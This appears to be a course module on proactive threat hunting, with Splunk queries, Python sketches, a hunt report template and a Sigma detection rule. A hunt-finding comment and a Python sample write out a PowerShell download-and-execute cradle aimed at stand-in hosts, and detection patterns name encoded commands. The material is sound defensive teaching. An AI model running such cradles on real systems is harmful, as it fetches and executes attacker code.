CSY301 Week 09 Advanced




Mental Model

"Assume breach, then prove yourself wrong. Alerts find known threats; hunting finds the threats that evade your alerts." — Threat Hunting Principle

Traditional security waits for alerts. But sophisticated adversaries specifically design their operations to avoid triggering alerts—they use legitimate tools, blend into normal traffic, and move slowly to stay under detection thresholds. Threat hunting flips the paradigm: instead of waiting, hunters proactively search for evidence of compromise that automated systems miss.

Learning Outcomes

By the end of this week, you will be able to:

  • LO1: Define threat hunting and distinguish it from reactive detection and monitoring
  • LO2: Develop well-formed, threat-informed hunting hypotheses
  • LO3: Identify data sources and telemetry required for effective hunting
  • LO4: Apply hunting techniques including stacking, clustering, and behavioral analysis
  • LO5: Execute systematic hunts and convert findings into detection improvements

1. What Is Threat Hunting?

Threat hunting is the proactive, hypothesis-driven search for threats that have evaded existing security controls. Unlike monitoring (which waits for alerts) or incident response (which reacts to confirmed incidents), hunting actively seeks evidence of compromise before alerts fire.

Hunting vs. Monitoring vs. Incident Response

┌─────────────────────────────────────────────────────────────────┐
│         SECURITY OPERATIONS PARADIGMS COMPARED                  │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  MONITORING (Reactive - Alert-Driven)                          │
│  ────────────────────────────────────                          │
│  • Waits for alerts to trigger                                 │
│  • Rule-based detection                                        │
│  • Automated at scale                                          │
│  • Finds KNOWN threats                                         │
│  • High volume, low touch                                      │
│                                                                 │
│  INCIDENT RESPONSE (Reactive - Event-Driven)                   │
│  ───────────────────────────────────────────                   │
│  • Responds to confirmed incidents                             │
│  • Investigation and containment                               │
│  • Human-intensive                                             │
│  • Finds CONFIRMED threats                                     │
│  • Low volume, high touch                                      │
│                                                                 │
│  THREAT HUNTING (Proactive - Hypothesis-Driven)                │
│  ──────────────────────────────────────────────                │
│  • Actively seeks evidence                                     │
│  • Hypothesis-based exploration                                │
│  • Human creativity + data analysis                            │
│  • Finds UNKNOWN threats                                       │
│  • Medium volume, high expertise                               │
│                                                                 │
│  ═══════════════════════════════════════════════════════════   │
│  All three are necessary. They complement, not replace.        │
│  ═══════════════════════════════════════════════════════════   │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

The Hunting Maturity Model (HMM)

Organizations progress through maturity levels in their hunting capabilities:

┌─────────────────────────────────────────────────────────────────┐
│                  HUNTING MATURITY MODEL                         │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  HMM0 - INITIAL                                                │
│  ─────────────────                                             │
│  • No hunting capability                                       │
│  • Purely reactive posture                                     │
│  • Limited data collection                                     │
│  • Relies entirely on vendor alerts                            │
│                                                                 │
│  HMM1 - MINIMAL                                                │
│  ─────────────────                                             │
│  • Some ad-hoc hunting                                         │
│  • Relies primarily on IOC searches                            │
│  • Limited methodology                                         │
│  • Hunting after incidents                                     │
│                                                                 │
│  HMM2 - PROCEDURAL                                             │
│  ──────────────────                                            │
│  • Documented hunting procedures                               │
│  • Regular hunting cadence                                     │
│  • Some hypothesis-based hunts                                 │
│  • Uses threat intelligence                                    │
│                                                                 │
│  HMM3 - INNOVATIVE                                             │
│  ─────────────────                                             │
│  • Custom tools and techniques                                 │
│  • Threat intel driven hypotheses                              │
│  • Creates new detection methods                               │
│  • Shares findings with community                              │
│                                                                 │
│  HMM4 - LEADING                                                │
│  ─────────────────                                             │
│  • Automated hunt assistance                                   │
│  • Original threat research                                    │
│  • Contributes to industry knowledge                           │
│  • Continuous methodology improvement                          │
│                                                                 │
│  Most organizations: HMM1-HMM2                                 │
│  Goal: Progress toward HMM3                                    │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Requirements for Effective Hunting

  • Data: telemetry to search (endpoint, network, and log sources) with adequate retention
  • Tools: a platform for querying and analyzing that data at scale
  • Skills: analysts who understand attacker techniques and the local environment
  • Time: dedicated hours protected from reactive alert work

Key Insight: You can't hunt what you can't see. Data collection and retention are prerequisites—if you don't have endpoint telemetry, you can't hunt for process injection. If you don't retain logs for 90 days, you can't find slow-moving adversaries.

2. Hypothesis-Driven Hunting

Effective hunts start with a hypothesis—a testable statement about adversary behavior that you seek to prove or disprove. Without hypotheses, hunting becomes aimless log browsing.

Hypothesis Structure

┌─────────────────────────────────────────────────────────────────┐
│                   HUNTING HYPOTHESIS TEMPLATE                   │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  "If [THREAT/TECHNIQUE] is present in our environment,         │
│   we would expect to see [OBSERVABLE EVIDENCE]                  │
│   in [DATA SOURCE]."                                           │
│                                                                 │
│  ───────────────────────────────────────────────────────────   │
│                                                                 │
│  EXAMPLE HYPOTHESES:                                           │
│                                                                 │
│  1. Credential Theft                                           │
│     "If attackers are using Mimikatz in our environment,       │
│      we would expect to see lsass.exe memory access            │
│      from unusual processes in our EDR telemetry."             │
│                                                                 │
│  2. Lateral Movement                                           │
│     "If attackers are moving laterally via PsExec,             │
│      we would expect to see PSEXESVC.exe service creation      │
│      in Windows event logs on multiple systems."               │
│                                                                 │
│  3. Data Exfiltration                                          │
│     "If attackers are staging data for exfiltration,           │
│      we would expect to see large archive file creation        │
│      in unusual directories in our file monitoring."           │
│                                                                 │
│  4. Persistence                                                │
│     "If attackers have established scheduled task persistence, │
│      we would expect to see tasks created by non-admin         │
│      processes in Windows Event ID 4698."                      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            
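The template above also lends itself to structured tracking, so hypotheses can live in a backlog rather than in analysts' heads. A minimal Python sketch (the field names are illustrative, not from any specific hunt-management tool):

```python
from dataclasses import dataclass

@dataclass
class HuntHypothesis:
    """One testable hunting hypothesis, following the
    'If X is present, we expect Y in Z' template."""
    threat: str        # technique or threat being hunted
    evidence: str      # observable we expect to see
    data_source: str   # where we would see it

    def statement(self) -> str:
        return (f"If {self.threat} is present in our environment, "
                f"we would expect to see {self.evidence} "
                f"in {self.data_source}.")

h = HuntHypothesis(
    threat="Mimikatz credential theft",
    evidence="lsass.exe memory access from unusual processes",
    data_source="our EDR telemetry",
)
print(h.statement())
```

Storing hypotheses as records like this makes it easy to prioritize them, attach ATT&CK IDs, and mark them done after each hunt.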

Hypothesis Sources

Where do hunting hypotheses come from?

Source | Description | Example
Threat Intelligence | TTPs from threat reports about actors targeting your industry | "APT29 uses WMI for persistence—let's hunt for suspicious WMI subscriptions"
MITRE ATT&CK | Techniques you haven't validated detection for | "We have no detection for T1055 Process Injection—let's hunt for indicators"
Incidents/Near-Misses | Techniques seen in your environment or at industry peers | "Our peer was hit via malicious Office macros—let's hunt for similar activity"
Detection Gaps | Known blind spots in your monitoring | "We don't monitor PowerShell on workstations—let's hunt there"
Anomaly Investigation | Unusual patterns noticed during other work | "I noticed unusual DNS queries—let's hunt for DNS tunneling"
Red Team Results | Techniques that succeeded in assessments | "Red team used Kerberoasting—let's hunt for evidence in production"

The Hunting Loop

┌─────────────────────────────────────────────────────────────────┐
│                      THE HUNTING LOOP                           │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│         ┌──────────────────────────────────────────┐           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │  HYPOTHESIS │ ◄── Intel, ATT&CK, Incidents      │           │
│  │  CREATION   │                                   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │    DATA     │                                   │           │
│  │ COLLECTION  │ ◄── Identify required telemetry   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │   ANALYSIS  │ ◄── Query, stack, cluster         │           │
│  │  EXECUTION  │                                   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ├─────────────┐                            │           │
│         │             │                            │           │
│         ▼             ▼                            │           │
│  ┌───────────┐  ┌───────────┐                      │           │
│  │  FINDING  │  │ NO FINDING│                      │           │
│  │  (Threat) │  │ (Clean)   │                      │           │
│  └─────┬─────┘  └─────┬─────┘                      │           │
│        │              │                            │           │
│        ▼              ▼                            │           │
│  ┌───────────┐  ┌───────────┐                      │           │
│  │INVESTIGATE│  │  REFINE   │──────────────────────┘           │
│  │& RESPOND  │  │HYPOTHESIS │                                  │
│  └─────┬─────┘  └───────────┘                                  │
│        │                                                       │
│        ▼                                                       │
│  ┌─────────────┐                                               │
│  │  IMPROVE    │ ◄── Create detection rule                     │
│  │ DETECTION   │     Document technique                        │
│  └─────────────┘     Share with team                           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Key Insight: A hunt without a hypothesis is just browsing logs. Hypotheses focus effort, make hunts measurable, and ensure you're looking for threats that matter to your organization.

3. Hunting Techniques

Multiple analytical approaches help find hidden threats. Effective hunters combine techniques based on available data and hypothesis requirements.

Technique 1: IOC Searching

Search for known-bad indicators from threat intelligence:

# IOC-Based Searching Examples (Splunk SPL)

# Search for known malicious file hashes
index=edr file_hash IN (
    "a1b2c3d4e5f6...",
    "b2c3d4e5f6a1...",
    "c3d4e5f6a1b2..."
)

# Search for known C2 domains
index=dns query IN (
    "evil-domain.com",
    "malware-c2.net",
    "*.badactor.org"
)

# Search for known attacker IPs (RFC 1918 placeholders shown;
# substitute real intelligence-supplied addresses)
index=firewall dest_ip IN (
    "192.168.1.100",
    "10.0.0.50"
)
| stats count by src_ip, dest_ip, dest_port

# Limitations of IOC searching:
# - Only finds KNOWN threats
# - IOCs change frequently (especially IPs/domains)
# - Reactive rather than proactive
# - Best for: validating intel, checking for known campaigns
            

Technique 2: Stacking (Frequency Analysis)

Find rare events that might indicate malicious activity. Principle: attackers do unusual things that stand out statistically.

# Stacking Examples - Finding Rare Events

# Rare processes across environment
index=edr event_type=process_start
| stats count by process_name
| where count < 5
| sort count

# Rare outbound destinations
index=firewall direction=outbound action=allow
| stats count dc(src_ip) as unique_sources by dest_ip
| where count < 10 AND unique_sources < 3
| sort count

# Rare scheduled tasks (potential persistence)
index=windows EventCode=4698
| stats count by TaskName
| where count = 1

# Rare services created
index=windows EventCode=7045
| stats count by ServiceName
| where count < 3

# Rare parent-child process relationships
index=edr event_type=process_start
| stats count by parent_process_name, process_name
| where count < 5
| sort count

# IMPORTANT: Rare ≠ Malicious
# Stacking identifies candidates for investigation
# Human analysis determines if rare = suspicious
            
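The same stacking idea can be sketched outside the SIEM. A minimal Python version using `collections.Counter` over process-start events (the event data and threshold are illustrative):

```python
from collections import Counter

# Simulated process-start telemetry: (host, process_name)
events = [
    ("ws01", "chrome.exe"), ("ws02", "chrome.exe"), ("ws03", "chrome.exe"),
    ("ws01", "outlook.exe"), ("ws02", "outlook.exe"),
    ("ws07", "rundl132.exe"),   # typosquatted name, appears only once
]

# Stack: count occurrences of each process across the environment
counts = Counter(name for _, name in events)

# Surface rare candidates (rare != malicious; these need human review)
RARE_THRESHOLD = 2
rare = sorted(name for name, c in counts.items() if c < RARE_THRESHOLD)
print(rare)
```

The output is a list of investigation candidates, exactly as with the SPL `where count < N` pattern: the analyst, not the script, decides whether rare means suspicious.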

Technique 3: Clustering (Pattern Grouping)

Group similar activities and look for anomalies within clusters:

# Clustering Examples - Finding Anomalies in Groups

# Group processes by parent, find unusual children
index=edr event_type=process_start parent_process_name="explorer.exe"
| stats count values(process_name) as children by host
| where count > 20
| mvexpand children
| stats count by children
| where count < 5

# Group network connections by process
index=edr event_type=network_connection
| stats sum(bytes_out) as total_bytes
        dc(dest_ip) as unique_destinations
        by process_name
| where unique_destinations > 50 OR total_bytes > 1000000000
| sort -total_bytes

# Group authentications by source IP
index=windows EventCode=4624
| stats count dc(TargetUserName) as unique_users by IpAddress
| where unique_users > 10
| sort -unique_users

# Look for: Outliers in clusters
#           Unexpected groupings
#           Rare combinations within normal groups
            
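Clustering can likewise be sketched in a few lines of Python: group children under each parent process, then flag rare pairs inside otherwise-normal clusters (the process names and threshold are illustrative):

```python
from collections import defaultdict, Counter

# Simulated (parent_process, child_process) pairs
pairs = (
    [("explorer.exe", "chrome.exe")] * 40
    + [("explorer.exe", "outlook.exe")] * 25
    + [("winword.exe", "powershell.exe")]  # Office spawning a shell: rare pair
)

# Cluster children under each parent
by_parent = defaultdict(Counter)
for parent, child in pairs:
    by_parent[parent][child] += 1

# Flag rare parent-child combinations within the clusters
outliers = [
    (parent, child, n)
    for parent, children in by_parent.items()
    for child, n in children.items()
    if n < 5
]
print(outliers)
```

Here the interesting result is not the rare process itself but the rare combination: powershell.exe is common, winword.exe is common, but winword.exe spawning powershell.exe is the outlier worth investigating.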

Technique 4: Behavioral Analysis

Look for suspicious behavior patterns regardless of specific IOCs:

# Behavioral Analysis Examples

# PowerShell with encoded commands (common evasion)
index=windows EventCode=4104
| search ScriptBlockText="*-enc*" OR ScriptBlockText="*-encoded*"
        OR ScriptBlockText="*FromBase64*"
| table _time, ComputerName, ScriptBlockText

# Processes running from suspicious directories
index=edr event_type=process_start
| where match(process_path, "(?i)\\\\(temp|tmp|appdata\\\\local\\\\temp)\\\\")
| stats count by process_name, process_path, host

# Admin tools from non-admin systems
index=edr process_name IN ("psexec.exe", "wmic.exe", "net.exe", "nltest.exe")
| where NOT match(host, "(?i)(admin|jump|bastion)")
| stats count by host, process_name, user

# Network connections from unusual processes
index=edr event_type=network_connection
| where process_name IN ("notepad.exe", "calc.exe", "mspaint.exe")
| stats count by process_name, dest_ip, dest_port

# LSASS access (credential theft indicator)
index=edr event_type=process_access target_process="lsass.exe"
| where NOT source_process IN ("csrss.exe", "services.exe", "svchost.exe")
| stats count by source_process, host

# Focus: What attackers DO, not what files they use
# Behavior persists even when tools change
            
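Because behavioral hunting matches what attackers do rather than specific hashes, the core of it can be expressed as pattern checks over activity records. A Python sketch over script-block text (the patterns and samples are illustrative, not a complete detection):

```python
import re

# Behavioral indicators: encoded commands and download cradles,
# independent of any particular file hash or tool name
SUSPICIOUS = re.compile(
    r"-enc\b|-encodedcommand\b|FromBase64String|DownloadString",
    re.IGNORECASE,
)

script_blocks = [
    "Get-ChildItem C:\\Users",
    "powershell -enc SQBFAFgA...",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.test/x.ps1')",
]

hits = [s for s in script_blocks if SUSPICIOUS.search(s)]
print(len(hits))
```

An attacker can trivially change a file hash; changing the underlying behavior (downloading and executing code in memory) is far harder, which is why these patterns stay useful longer than IOCs.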

Technique 5: Baseline Deviation

Compare current activity against established baselines:

# Baseline Deviation Examples

# Processes that appeared recently (not in baseline)
index=edr event_type=process_start earliest=-24h
| stats count by process_name
| search NOT [
    search index=edr event_type=process_start earliest=-30d latest=-7d
    | stats count by process_name
    | fields process_name
]

# Users authenticating from new locations
# (user + source IP pairs seen in the last 24h but never in the baseline)
index=windows EventCode=4624 earliest=-90d
| eval period=if(_time >= relative_time(now(), "-24h"), "recent", "baseline")
| stats dc(period) as periods, values(period) as seen_in by TargetUserName, IpAddress
| where periods=1 AND seen_in="recent"

# Unusual outbound data volumes
index=firewall direction=outbound earliest=-24h
| stats sum(bytes) as daily_bytes by src_ip
| join src_ip [
    search index=firewall direction=outbound earliest=-30d latest=-1d
    | bin _time span=1d
    | stats sum(bytes) as day_bytes by src_ip, _time
    | stats avg(day_bytes) as avg_daily by src_ip
]
| where daily_bytes > (avg_daily * 10)

# Requires: Good baseline data (30-90 days)
#           Understanding of "normal" in your environment
            
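Stripped to its essence, baseline deviation is a set difference between "seen recently" and "seen historically". A minimal Python sketch (the process sets are illustrative):

```python
# 30-day baseline of observed process names vs. the last 24 hours
baseline = {"chrome.exe", "outlook.exe", "svchost.exe", "teams.exe"}
today = {"chrome.exe", "svchost.exe", "procdump64.exe"}

# Anything seen today but absent from the baseline is a candidate for review
new_processes = sorted(today - baseline)
print(new_processes)
```

The quality of this technique depends entirely on the baseline window, which is why the SPL examples above draw it from 30 to 90 days of history.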

4. Data Sources for Hunting

Different data sources enable different types of hunts. Understanding what each source provides helps target hypotheses appropriately.

Essential Data Sources

┌─────────────────────────────────────────────────────────────────┐
│                  HUNTING DATA SOURCES                           │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ENDPOINT TELEMETRY (EDR)                    PRIORITY: HIGH    │
│  ─────────────────────────                                     │
│  • Process creation (parent, child, command line)              │
│  • File operations (create, modify, delete)                    │
│  • Registry modifications                                      │
│  • Network connections per process                             │
│  • Memory operations (injection, access)                       │
│  → Hunt for: Execution, persistence, defense evasion           │
│                                                                 │
│  WINDOWS EVENT LOGS                          PRIORITY: HIGH    │
│  ─────────────────────                                         │
│  • Security (4624, 4625, 4648, 4672, 4698, 4720)              │
│  • PowerShell (4103, 4104)                                     │
│  • Sysmon (if deployed)                                        │
│  • System (7045 services)                                      │
│  → Hunt for: Authentication, privilege use, persistence        │
│                                                                 │
│  NETWORK TELEMETRY                           PRIORITY: HIGH    │
│  ─────────────────────                                         │
│  • Firewall logs (connections, blocks)                         │
│  • DNS queries and responses                                   │
│  • Proxy/web filter logs                                       │
│  • NetFlow/IPFIX                                               │
│  → Hunt for: C2, exfiltration, lateral movement                │
│                                                                 │
│  AUTHENTICATION LOGS                         PRIORITY: MEDIUM  │
│  ─────────────────────                                         │
│  • Active Directory (domain controllers)                       │
│  • VPN authentication                                          │
│  • Cloud identity (Azure AD, Okta)                             │
│  • Application authentication                                  │
│  → Hunt for: Credential abuse, account compromise              │
│                                                                 │
│  CLOUD LOGS                                  PRIORITY: MEDIUM  │
│  ───────────                                                   │
│  • CloudTrail (AWS), Activity Log (Azure)                      │
│  • Office 365/M365 audit logs                                  │
│  • SaaS application logs                                       │
│  → Hunt for: Cloud-based attacks, insider threats              │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Key Windows Event IDs for Hunting

Event ID | Description | Hunt Use Case
4624 | Successful logon | Lateral movement, anomalous access
4625 | Failed logon | Brute force, password spray
4648 | Explicit credential logon | Credential use across systems
4672 | Special privileges assigned | Privilege escalation
4688 | Process creation | Execution (enable command line logging)
4698 | Scheduled task created | Persistence mechanisms
4720 | User account created | Persistence via new accounts
7045 | Service installed | Persistence, lateral movement
4104 | PowerShell script block | Malicious scripts, encoded commands
1 (Sysmon) | Process creation with hashes | Detailed execution tracking
3 (Sysmon) | Network connection | Process-level network activity
10 (Sysmon) | Process access | Credential dumping (LSASS access)
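For triage tooling, a table like the one above can be folded into a lookup that annotates raw events with their hunt relevance. A minimal Python sketch covering a few of the IDs:

```python
# Enrichment lookup built from the event ID table (subset shown)
HUNT_USE = {
    4624: "Successful logon: lateral movement, anomalous access",
    4688: "Process creation: execution",
    4698: "Scheduled task created: persistence",
    7045: "Service installed: persistence, lateral movement",
}

def annotate(event_id: int) -> str:
    """Return the hunting context for a Windows event ID, if mapped."""
    return HUNT_USE.get(event_id, "No hunt mapping")

print(annotate(4698))
```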

5. Executing and Documenting Hunts

Systematic execution and documentation ensure hunts are repeatable, measurable, and valuable beyond finding individual threats.

Hunt Execution Workflow

┌─────────────────────────────────────────────────────────────────┐
│                    HUNT EXECUTION WORKFLOW                      │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  PHASE 1: PREPARATION                                          │
│  ─────────────────────                                         │
│  □ Define hypothesis clearly                                   │
│  □ Identify required data sources                              │
│  □ Verify data availability and retention                      │
│  □ Determine time scope (last 7 days? 30 days?)               │
│  □ Plan initial queries                                        │
│                                                                 │
│  PHASE 2: EXECUTION                                            │
│  ──────────────────                                            │
│  □ Run initial broad query                                     │
│  □ Review result volume—too many? Refine.                      │
│  □ Apply filters to reduce false positives                     │
│  □ Stack/cluster results to find outliers                      │
│  □ Document interesting findings                               │
│                                                                 │
│  PHASE 3: ANALYSIS                                             │
│  ─────────────────                                             │
│  □ For each candidate: Is this expected? Suspicious? Unknown?  │
│  □ Gather additional context for suspicious items              │
│  □ Correlate across data sources                               │
│  □ Determine: Finding, No Finding, or Need More Data           │
│                                                                 │
│  PHASE 4: RESPONSE (if finding)                                │
│  ──────────────────────────────                                │
│  □ Escalate to incident response if confirmed threat           │
│  □ Scope the compromise                                        │
│  □ Preserve evidence                                           │
│  □ Coordinate containment                                      │
│                                                                 │
│  PHASE 5: IMPROVEMENT                                          │
│  ─────────────────────                                         │
│  □ Create/update detection rule for finding                    │
│  □ Document hunt for future reference                          │
│  □ Share learnings with team                                   │
│  □ Identify data gaps encountered                              │
│  □ Queue related hypotheses                                    │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Hunt Documentation Template

THREAT HUNT DOCUMENTATION
═════════════════════════

HUNT METADATA
─────────────
Hunt ID:        TH-2025-042
Hunter:         [Name]
Date:           2025-01-15
Duration:       4 hours
Status:         Completed - No Finding

HYPOTHESIS
──────────
Statement:      "If attackers are using Kerberoasting in our environment,
                we would expect to see TGS requests for SPNs associated
                with service accounts from workstations."

Source:         Red team report identified Kerberoasting as viable
ATT&CK:         T1558.003 - Kerberoasting
Priority:       High (credential access)

DATA SOURCES
────────────
Primary:        Domain Controller Security Logs (Event 4769)
Secondary:      EDR process telemetry
Time Range:     Last 30 days
Availability:   ✓ All required data available

QUERIES EXECUTED
────────────────
Query 1 - Baseline TGS requests:
    index=windows EventCode=4769
    | stats count by ServiceName, ClientAddress
    | where NOT match(ClientAddress, "^10\\.10\\.(1|2)\\.")
    Note: the excluded 10.10.1.x/10.10.2.x ranges are the server subnets.

Query 2 - Anomalous encryption types:
    index=windows EventCode=4769 TicketEncryptionType=0x17
    | stats count by ServiceName, AccountName, ClientAddress

Query 3 - High-volume requesters:
    index=windows EventCode=4769
    | stats dc(ServiceName) as unique_spns by ClientAddress
    | where unique_spns > 10

FINDINGS
────────
Result:         No malicious activity identified

Observations:
- 3 workstations showed >10 unique SPN requests
- Investigated: All were IT admin workstations running
  legitimate management tools
- No anomalous encryption downgrade attempts
- No requests from unexpected sources

False Positives Identified:
- ServiceNow integration queries multiple SPNs (expected)
- Backup software service account (documented)

DETECTION IMPROVEMENTS
──────────────────────
□ Created alert for: TGS requests with RC4 encryption (0x17)
  from non-admin workstations
□ Added exclusions for known legitimate high-volume requesters
□ Documented baseline for future comparison

FOLLOW-UP ACTIONS
─────────────────
□ Schedule re-hunt in 90 days
□ Expand hypothesis to include AS-REP roasting
□ Verify Kerberos logging on all DCs
            

Converting Hunts to Detection Rules

# Example: Hunt Finding → Detection Rule

# HUNT FINDING:
# Discovered PowerShell downloading and executing from temp directory
# Command: powershell -ep bypass -c "IEX(New-Object Net.WebClient).
#          DownloadString('http://evil.com/payload.ps1')"

# DETECTION RULE (Sigma format):
title: PowerShell Download and Execute Pattern
id: 12345678-1234-1234-1234-123456789abc
status: experimental
description: Detects PowerShell downloading and executing scripts
references:
    - Internal Hunt TH-2025-042
author: Security Team
date: 2025/01/15
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    service: powershell
    definition: 'Script block logging must be enabled'
detection:
    selection:
        EventID: 4104
        ScriptBlockText|contains|all:
            - 'Net.WebClient'
            - 'DownloadString'
    condition: selection
falsepositives:
    - Legitimate admin scripts (rare)
level: high

# SPLUNK IMPLEMENTATION:
index=windows EventCode=4104
ScriptBlockText="*Net.WebClient*" ScriptBlockText="*DownloadString*"
| table _time, ComputerName, ScriptBlockText
            
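The Sigma `contains|all` selection above is just an AND of substring checks, which makes it easy to unit-test a rule's logic before deployment. A minimal Python equivalent of that selection:

```python
def matches_rule(script_block: str) -> bool:
    """Mirror of the Sigma selection: ScriptBlockText|contains|all
    means every listed substring must be present."""
    needles = ("Net.WebClient", "DownloadString")
    return all(n in script_block for n in needles)

# The original hunt finding should match; benign text should not
assert matches_rule(
    "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
)
assert not matches_rule("Write-Host 'Net.WebClient mentioned in a comment'")
```

Testing rules against both the triggering finding and known-benign samples before rollout helps keep the false positive rate predictable.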

6. Building a Hunting Program

Individual hunts provide value; a hunting program provides sustained, improving capability.

Program Components

┌─────────────────────────────────────────────────────────────────┐
│                    HUNTING PROGRAM ELEMENTS                     │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  PEOPLE                                                         │
│  ──────                                                         │
│  • Dedicated hunters (not just spare SOC time)                 │
│  • Training and skill development                              │
│  • Career path for hunters                                     │
│  • Collaboration with threat intel, IR, red team               │
│                                                                 │
│  PROCESS                                                        │
│  ───────                                                        │
│  • Regular hunting cadence (weekly/monthly)                    │
│  • Hypothesis backlog and prioritization                       │
│  • Documentation standards                                     │
│  • Metrics and reporting                                       │
│  • Feedback loop to detection engineering                      │
│                                                                 │
│  TECHNOLOGY                                                     │
│  ──────────                                                     │
│  • Hunting platform (SIEM, EDR, data lake)                     │
│  • Query tools and automation                                  │
│  • Hypothesis and hunt tracking                                │
│  • Collaboration and knowledge sharing                         │
│                                                                 │
│  INTELLIGENCE                                                   │
│  ────────────                                                   │
│  • Threat intel integration                                    │
│  • ATT&CK coverage mapping                                     │
│  • Industry threat awareness                                   │
│  • Internal incident learnings                                 │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Hunting Program Metrics

Metric Category   Specific Metrics                                      Why It Matters
Activity          Hunts completed per month, hours spent hunting        Shows program is active and resourced
Coverage          ATT&CK techniques hunted, % of environment covered    Shows breadth of hunting
Findings          Threats found, incidents initiated from hunts         Demonstrates value (low numbers are acceptable)
Improvements      Detection rules created, gaps identified              Shows hunting improves overall security
Efficiency        Time to complete hunt, false positive rate            Shows program is maturing

Important: "Threats found" is not the primary success metric. A hunt that finds nothing but results in better detection rules is successful. Hunting value includes: threats found, detection improvements, visibility gaps identified, and increased defender knowledge.

Week 09 Quiz

Test your understanding of Threat Hunting Fundamentals.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Self-Check Questions

Test your understanding of threat hunting:

Question 1

What distinguishes threat hunting from security monitoring? Why are both necessary?

Reveal Answer

Key distinctions:

  • Monitoring: Reactive, alert-driven, automated, finds known threats at scale
  • Hunting: Proactive, hypothesis-driven, human-led, finds unknown threats that evade alerts

Why both are necessary:

  • Monitoring handles volume—you can't manually review every log
  • Hunting handles sophistication—advanced attackers evade automated detection
  • Hunting improves monitoring—findings become new detection rules
  • Together they provide defense against both commodity and advanced threats

Question 2

Create a hunting hypothesis for detecting potential data exfiltration in a corporate environment. Include the hypothesis statement, data sources needed, and initial query approach.

Reveal Answer

Hypothesis:

"If attackers are staging and exfiltrating data from our environment, we would expect to see unusual archive file creation followed by large outbound data transfers to uncommon destinations."

Data sources:

  • Endpoint telemetry (file creation, specifically .zip, .rar, .7z)
  • Firewall/proxy logs (outbound bytes by destination)
  • Network flow data (volume patterns)

Initial queries:

  1. Find archive file creation in unusual locations (not user Downloads)
  2. Stack outbound destinations by total bytes transferred
  3. Correlate: systems with recent archive creation + large outbound transfers
  4. Filter out known backup and file sharing destinations
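The stack-and-correlate steps above can be sketched in Python over exported telemetry. This is a minimal illustration, not a production query: the record shapes, field names (host, dest, bytes), hostnames, and the 1 GB threshold are all assumptions you would replace with your own data and baselines.

```python
from collections import defaultdict

# Hypothetical exported records; a real hunt would pull these from
# EDR file-creation telemetry and proxy/firewall logs.
archive_events = [
    {"host": "WS-042", "path": r"C:\Windows\Temp\data.7z"},
]
outbound = [
    {"host": "WS-042", "dest": "transfer.example-cdn.net", "bytes": 2_400_000_000},
    {"host": "WS-017", "dest": "backup.corp.example.com", "bytes": 9_000_000_000},
]
known_good_dests = {"backup.corp.example.com"}  # step 4: known backup/file sharing

# Step 2: stack outbound destinations by total bytes transferred.
bytes_by_dest = defaultdict(int)
for rec in outbound:
    bytes_by_dest[rec["dest"]] += rec["bytes"]

# Step 3: correlate hosts with recent archive creation against large
# transfers to destinations not on the known-good list.
staging_hosts = {e["host"] for e in archive_events}
candidates = [
    rec for rec in outbound
    if rec["host"] in staging_hosts
    and rec["dest"] not in known_good_dests
    and rec["bytes"] > 1_000_000_000  # threshold is illustrative; tune per environment
]
for c in candidates:
    print(c["host"], c["dest"], c["bytes"])
```

The surviving candidates are investigation leads, not verdicts — each still needs manual triage.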

Question 3

Explain the "stacking" technique in threat hunting. When is it most effective, and what are its limitations?

Reveal Answer

Stacking technique:

Stacking (frequency analysis) counts occurrences of events and identifies rare outliers. It is based on the principle that attackers do unusual things that stand out statistically in large datasets.

Most effective when:

  • Large, relatively homogeneous environment (rare really is rare)
  • Good baseline data for comparison
  • Hunting for activities that should be uncommon (new processes, unusual destinations)
  • Initial triage to identify candidates for deeper investigation

Limitations:

  • Rare ≠ malicious—many false positives require human analysis
  • Attackers using common tools may not appear rare
  • Doesn't work well in diverse environments where everything is "rare"
  • Requires sufficient data volume for statistics to be meaningful
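The core of stacking can be shown in a few lines of Python. The parent/child process pairs, counts, and the 0.1% rarity threshold below are invented for illustration; a real stack would run over your own EDR telemetry with a tuned threshold.

```python
from collections import Counter

# Hypothetical process telemetry: (parent, child) process pairs.
events = (
    [("explorer.exe", "chrome.exe")] * 4800
    + [("services.exe", "svchost.exe")] * 3100
    + [("winword.exe", "powershell.exe")] * 2  # rare pairing worth a look
)

counts = Counter(events)
total = len(events)

# Flag pairs seen in fewer than 0.1% of events. Rare is not the same as
# malicious, so these are triage candidates only.
rare = [(pair, n) for pair, n in counts.items() if n / total < 0.001]
for pair, n in sorted(rare, key=lambda x: x[1]):
    print(pair, n)
```

Note how the limitations above surface immediately: in a small or highly diverse dataset, nearly everything would fall under the threshold.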

Question 4

A hunt completes with no threats found. The hypothesis was well-formed and the data was available. Is this hunt a success or failure? What should happen next?

Reveal Answer

This hunt is a SUCCESS, not a failure.

Why it's successful:

  • Provides confidence that the specific threat isn't present (currently)
  • Validated that detection capability exists for this technique
  • Hunter gained expertise in this attack pattern
  • Documentation enables future re-hunting

What should happen next:

  1. Document the hunt thoroughly (queries, observations, baseline)
  2. Create or validate detection rule for ongoing monitoring
  3. Schedule a re-hunt (e.g., quarterly) to check again
  4. Refine hypothesis—are there related techniques to hunt?
  5. Share learnings with team

💡 Key insight

